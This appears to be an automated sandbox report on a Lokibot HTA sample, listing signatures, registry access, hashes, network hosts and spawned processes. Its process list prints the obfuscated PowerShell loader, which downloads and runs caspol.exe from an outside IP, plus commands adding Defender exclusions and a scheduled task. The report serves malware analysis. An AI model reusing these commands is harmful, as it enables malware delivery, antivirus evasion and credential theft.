Analysis Overview
SHA256
a786cb2ae0dc8117e3bfc07bca8bb0e5d4545ab8f5b4aa042c9ee85dca7b43a0
Threat Level: Known bad
The file greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta was found to be: Known bad.
Malicious Activity Summary
Lokibot
Lokibot family
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Evasion via Device Credential Deployment
Blocklisted process makes network request
Reads user/profile data of web browsers
Checks computer location settings
Executes dropped EXE
Loads dropped DLL
Accesses Microsoft Outlook profiles
Suspicious use of SetThreadContext
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
outlook_win_path
Suspicious use of AdjustPrivilegeToken
Scheduled Task/Job: Scheduled Task
outlook_office_path
Modifies Internet Explorer settings
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-20 07:19
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-20 07:19
Reported
2024-11-20 07:21
Platform
win7-20240903-en
Max time kernel
119s
Max time network
125s
Command Line
Signatures
Lokibot
Lokibot family
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Evasion via Device Credential Deployment
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe | N/A |
Reads user/profile data of web browsers
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2844 set thread context of 2216 | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | C:\Users\Admin\AppData\Roaming\caspol.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1846800975-3917212583-2893086201-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta"
C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe
"C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yygz-_yf.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD7BA.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCD7B9.tmp"
C:\Users\Admin\AppData\Roaming\caspol.exe
"C:\Users\Admin\AppData\Roaming\caspol.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\caspol.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\rrwscqkDSNwLK.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\Admin\AppData\Local\Temp\tmp5B69.tmp"
C:\Users\Admin\AppData\Roaming\caspol.exe
"C:\Users\Admin\AppData\Roaming\caspol.exe"
Network
| Country | Destination | Domain | Proto |
| US | 192.3.243.136:80 | 192.3.243.136 | tcp |
| DE | 94.156.177.41:80 | 94.156.177.41 | tcp |
| DE | 94.156.177.41:80 | 94.156.177.41 | tcp |
| DE | 94.156.177.41:80 | 94.156.177.41 | tcp |
| DE | 94.156.177.41:80 | 94.156.177.41 | tcp |
Files
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 9a5f8f28cd7be7a84d1d0cf33bac967f |
| SHA1 | d3f2b64909980123efdb7077997b8fb7df2bd841 |
| SHA256 | 01f303a121024bbf0992561d9323bf218cddd617d82aea5d862c12da974bdafd |
| SHA512 | 3226321cd441392715cafd9f0909048ccc3003d747625e20b0631f3ef2eed89248c5bdfcd4cb0c6256a830c1b6653a64dfdf78ceb215fffbf7d5f9aa1512434f |
\??\c:\Users\Admin\AppData\Local\Temp\yygz-_yf.cmdline
| MD5 | 5423583de2ddb787508e3d60ef57237d |
| SHA1 | 9ae2c941350820f705adced6f8d7327de8aa56a9 |
| SHA256 | 3a75ab620ed0a503c47f6d8843b5c224525f67fe9ed28f54561043a650a43cd1 |
| SHA512 | 39a84d9ec48bffcef7d6b50adfcb1f18dadd7a6366e76a56415c222dfcde2ed82cabc7f8e46230f4873e11655d79ea4d9374e70f2ffd5e1aa98e1ba02b1ff7ec |
\??\c:\Users\Admin\AppData\Local\Temp\yygz-_yf.0.cs
| MD5 | fe82050659a8b97690d60529499222c1 |
| SHA1 | 7cc50135852b46dd1e36f2ff98506613db525a68 |
| SHA256 | 64c38563c4588b718b03aec685677f173456d3c961ef97cd95e7784ee1e51a6a |
| SHA512 | 59356fd5cbb38a06bf09e182b8ed7c7c2200e6f8de8e950be38bee0c45aa96b2dbf202bdc56097a74acc4e0a8bc601558e83c098a376630cfa1bcce64133d64f |
\??\c:\Users\Admin\AppData\Local\Temp\CSCD7B9.tmp
| MD5 | df2a95e4185073c5332d6df93099c54e |
| SHA1 | 73414dc5dda05bdcae60ad1a0ee19821dfb06088 |
| SHA256 | 4be699c85a59f2bfeca2f059afbd77573231bae4947bde88c5bd9db246494670 |
| SHA512 | cf13d791464125af71aa959634674bf5e6abe80a09493683d5fd1cb78cbc0f22e4f3034552bd0971b84216cb0ce72b526e8e8e31d2f1aa15ced80a14b5700a4a |
C:\Users\Admin\AppData\Local\Temp\RESD7BA.tmp
| MD5 | 3112e1b1ad9c31faa74f1c23fa539356 |
| SHA1 | a4ca1a7c6858078749fbb53e96452563c6a6e2d4 |
| SHA256 | c5e3ca49a654c74b23b45b9c10bd52a07074f089296d7f238c07f70e59df95f2 |
| SHA512 | e6d8b36b949240b2176608cde7391db5aa2bfa02926be81777b3969970b6f2a83208185e3398377cfd53c3f0483665f4ef35a2b46aeb0b08204503d581b20626 |
C:\Users\Admin\AppData\Local\Temp\yygz-_yf.dll
| MD5 | 63b7c94192c91c41ed9599d4027f1864 |
| SHA1 | 2f729fbeef93d95f38291ff15a4f2a1e8abfe46f |
| SHA256 | f44cf0ee89deea2b92ceb23342473d7bfef4f86be796ad4426f263aaf09795ed |
| SHA512 | b11e3dafe861af2947c600261889f6b7985bfaee5e73925444e8edd779e0988fc000bb8f875d6bc49431e295dfc57559f58eb3d0de2afedf8eb744f2620165d8 |
C:\Users\Admin\AppData\Local\Temp\yygz-_yf.pdb
| MD5 | a45938611a6990e0538f54be4863c634 |
| SHA1 | 661d7dc529ae744893df27e5d2d89135a7976434 |
| SHA256 | 8d76319dd56ad6740350d97cadcc4353a8b5565687dd1e0e0b5fde43eec4ecdf |
| SHA512 | a73e7d284d259e94c3a70a4fed37b6a659327bbe3fc0d6838db63a9170e521d7032f9eaec1eec9a8b69d841448a5b2daea15882d9134d5090410958aef66ea1b |
\Users\Admin\AppData\Roaming\caspol.exe
| MD5 | 74061922f1e78c237a66d12a15a18181 |
| SHA1 | e31ee444aaa552a100f006e43f0810497a3b0387 |
| SHA256 | 89bf888148eae2caabdc6d3fff98054127b197b402493581894a3104ed6b6f1c |
| SHA512 | 306744107d78b02ecfd28252dae954f0b47c1f761e15a33c937474a2e15284c17bb7e2542618b745ea5f95e5a7dba3d27b675c8837914a44d8b5b350a3d4a136 |
memory/2844-44-0x0000000001250000-0x00000000012E8000-memory.dmp
memory/2844-45-0x0000000000340000-0x0000000000352000-memory.dmp
memory/2844-46-0x00000000052A0000-0x0000000005304000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 35fa34d8e175aca60aa63d5c0bbba04d |
| SHA1 | 2b12ff28f32f3cfd7e102c55b77efef53086784c |
| SHA256 | 3436cbceb57520feca975a98b44df7f33c453560b3f8f9f7103fe7f327a23051 |
| SHA512 | 8028b4c926e3fc56ac7649c15cf1824071296c2ca48d399b27a7841a9dc645da791fed16081abbb690835badf20b5909ad9c3f101752a1b9b00dffeeb618a53f |
C:\Users\Admin\AppData\Local\Temp\tmp5B69.tmp
| MD5 | 644acd672def50f90420e4f03528d496 |
| SHA1 | 03ddd4937e44f36e9cfbfd97812b8f0cd44fef73 |
| SHA256 | f0200586128367b78d108181914aee71aa5e921161c36921a9f98d291f86c2bf |
| SHA512 | 31ff4b7640c0a06e83741a132413b4bf85773d14b0a7a5a12306339f76b2fa4a66aa3934bca47ba4a6639ad7861a94c689a4d907ed81c5182e6d551d451bcac3 |
memory/2216-62-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/2216-68-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/2216-66-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/2216-64-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/2216-75-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/2216-73-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/2216-72-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2216-70-0x0000000000400000-0x00000000004A2000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1846800975-3917212583-2893086201-1000\0f5007522459c86e95ffcc62f32308f1_f9da27c9-c625-43c3-9b3a-b1344b01e128
| MD5 | d898504a722bff1524134c6ab6a5eaa5 |
| SHA1 | e0fdc90c2ca2a0219c99d2758e68c18875a3e11e |
| SHA256 | 878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9 |
| SHA512 | 26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61 |
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1846800975-3917212583-2893086201-1000\0f5007522459c86e95ffcc62f32308f1_f9da27c9-c625-43c3-9b3a-b1344b01e128
| MD5 | c07225d4e7d01d31042965f048728a0a |
| SHA1 | 69d70b340fd9f44c89adb9a2278df84faa9906b7 |
| SHA256 | 8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a |
| SHA512 | 23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b |
memory/2216-95-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/2216-103-0x0000000000400000-0x00000000004A2000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-20 07:19
Reported
2024-11-20 07:21
Platform
win10v2004-20241007-en
Max time kernel
148s
Max time network
159s
Command Line
Signatures
Lokibot
Lokibot family
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Evasion via Device Credential Deployment
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Reads user/profile data of web browsers
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1736 set thread context of 2744 | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | C:\Users\Admin\AppData\Roaming\caspol.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe
"C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5jeux4ci\5jeux4ci.cmdline"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDAB0.tmp" "c:\Users\Admin\AppData\Local\Temp\5jeux4ci\CSC8265DFDF4E4A4F1DACE6C6829FB3C9F8.TMP"
C:\Users\Admin\AppData\Roaming\caspol.exe
"C:\Users\Admin\AppData\Roaming\caspol.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\caspol.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\rrwscqkDSNwLK.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\Admin\AppData\Local\Temp\tmp4E79.tmp"
C:\Users\Admin\AppData\Roaming\caspol.exe
